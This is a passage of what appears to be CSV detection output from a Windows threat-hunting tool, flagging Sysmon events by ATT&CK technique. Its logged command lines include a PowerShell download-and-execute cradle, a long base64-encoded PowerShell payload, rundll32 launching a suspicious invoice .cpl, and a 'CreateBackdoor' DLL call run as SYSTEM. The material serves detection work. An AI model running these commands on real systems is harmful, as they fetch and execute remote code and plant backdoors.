AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4865 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:19.010 + 747F3D96-60F7-5D3F-0000-00106F2F5600 + 6160 + C:\Windows\SysWOW64\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt + C:\Users\IEUser\AppData\Local\Temp\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4910 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:23.170 + 747F3D96-6623-5D3F-0000-001011F68700 + 5816 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka105.inwitelecom.net ) , IP ( 105.73.6.105 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4132 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.721 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49705 + + false + 105.73.6.105 + aka105.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1019 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:26:09.417 + 365ABB72-D7B1-5CE6-0000-00102CD76D00 + 2240 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668164.122498,2019-05-12T17:36:04.122498+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16392 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:59.727 + 365ABB72-20C7-5CD8-0000-001021022500 + 1416 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681649.458113,2019-05-12T21:20:49.458113+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16513 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:49.261 + 365ABB72-55F1-5CD8-0000-0010781C3300 + 2392 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-55F1-5CD8-0000-00108A153300 + 3668 + C:\Windows\System32\ftp.exe + "C:\Windows\System32\ftp.exe" -s:c:\users\ieuser\appdata\local\temp\ftp.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.063277,2019-05-27T05:29:19.063277+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5946 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.023 + 365ABB72-3D6F-5CEB-0000-0010A6B1FF00 + 1508 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.518 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49704 + + false + 105.73.6.112 + aka112.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k 